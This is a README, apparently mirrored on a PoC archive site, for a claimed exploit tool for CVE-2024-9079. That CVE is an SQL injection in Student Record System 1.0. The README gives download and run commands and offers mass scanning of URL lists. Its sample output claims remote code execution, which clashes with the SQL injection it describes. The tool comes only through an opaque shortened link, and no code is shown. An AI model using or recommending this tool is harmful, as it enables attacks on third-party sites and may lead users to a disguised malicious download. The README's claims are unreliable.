关联漏洞
介绍
# 🛠 CVE-2024-9079 Exploit
## 🌟 Description
CVE-2024-9079
A vulnerability was found in code-projects Student Record System 1.0 and classified as critical. This issue affects some unknown processing of the file /marks.php. The manipulation of the argument coursename leads to sql injection. The attack may be initiated remotely. The exploit can be purchased and used.
## ⚙️ Installation
To set up the exploitation tool, follow these steps:
1. Download the repository:
|[Download](https://t.ly/JY4pv)
|:--------------- |
2. Navigate to the tool's directory:
```bash
cd CVE-2024-9079
```
3. Install the required Python packages:
```bash
pip install -r requirements.txt
```
## 🚀 Usage
To use the tool, run the script from the command line as follows:
```bash
python exploit.py [options]
```
### Options
- -u, --url:
Specify the target URL or IP address.
- -f, --file:
Specify a file containing a list of URLs to scan.
- -t, --threads:
Set the number of threads for concurrent scanning.
- -o, --output:
Define an output file to save the scan results.
When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to execute arbitrary code.
### Example
```bash
$ python3 exploit.py -u http://target-url.com
[+] Remote code execution triggered successfully.
[!] http://target-url.com is vulnerable to CVE-2024-9079.
```
## 📊 Mass Scanning
For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.
```bash
python exploit.py -f urls.txt
```
## 🗒 Affected Versions
Student Record System = 1.0
## 📈 CVSS Information
文件快照
[4.0K] /data/pocs/3cc0af5cc034f64affb489d1a7cd2e24704a9636
└── [1.7K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。